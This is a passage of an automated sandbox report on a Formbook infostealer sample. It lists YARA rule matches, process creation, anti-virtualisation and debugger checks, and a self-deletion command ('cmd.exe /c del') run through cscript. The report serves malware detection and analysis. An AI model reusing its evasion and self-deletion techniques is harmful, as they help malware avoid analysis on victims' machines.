          Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/3@16/10
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1488:120:WilError_01
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeFile created: C:\Users\user\AppData\Local\Temp\nsa7684.tmpJump to behavior
          Source: WXs8v9QuE7.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: WXs8v9QuE7.exeVirustotal: Detection: 18%
          Source: WXs8v9QuE7.exeReversingLabs: Detection: 19%
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeFile read: C:\Users\user\Desktop\WXs8v9QuE7.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\WXs8v9QuE7.exe 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Users\user\Desktop\WXs8v9QuE7.exe 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Users\user\Desktop\WXs8v9QuE7.exe 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe'
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: cscript.pdbUGP source: WXs8v9QuE7.exe, 00000001.00000002.302941895.0000000002AC0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: WXs8v9QuE7.exe, 00000000.00000003.228184886.0000000009990000.00000004.00000001.sdmp, WXs8v9QuE7.exe, 00000001.00000002.302101367.0000000000B8F000.00000040.00000001.sdmp, cscript.exe, 00000012.00000002.495021689.0000000004850000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: WXs8v9QuE7.exe, cscript.exe
          Source: Binary string: cscript.pdb source: WXs8v9QuE7.exe, 00000001.00000002.302941895.0000000002AC0000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeUnpacked PE file: 1.2.WXs8v9QuE7.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_100029F0 push eax; ret
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041624A pushad ; ret
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041B3C5 push eax; ret
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041B47C push eax; ret
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041B412 push eax; ret
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0041B41B push eax; ret
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_0040B7D2 push ebx; retf
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AED0D1 push ecx; ret
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_1_0041624A pushad ; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0057624A pushad ; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0057B3C5 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0057B47C push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0057B412 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0057B41B push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0056B7D2 push ebx; retf
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeFile created: C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000005685F4 second address: 00000000005685FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 000000000056898E second address: 0000000000568994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_004088C0 rdtsc
          Source: C:\Windows\explorer.exe TID: 1848Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 612Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: explorer.exe, 00000004.00000000.250033211.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.258894278.00000000011B3000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t
          Source: explorer.exe, 00000004.00000000.258969354.0000000001218000.00000004.00000020.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.250033211.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.249626505.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.261945560.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.258894278.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.250088865.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.249626505.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.268841101.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.249626505.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.250088865.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000004.00000000.249626505.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_10001D3B GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,lstrcatA,GetProcAddress,
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B13884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B13884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B64015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B64015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B17016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B61074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B52073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A99100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A952A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACD294 mov eax, dword ptr fs:[00000030h]
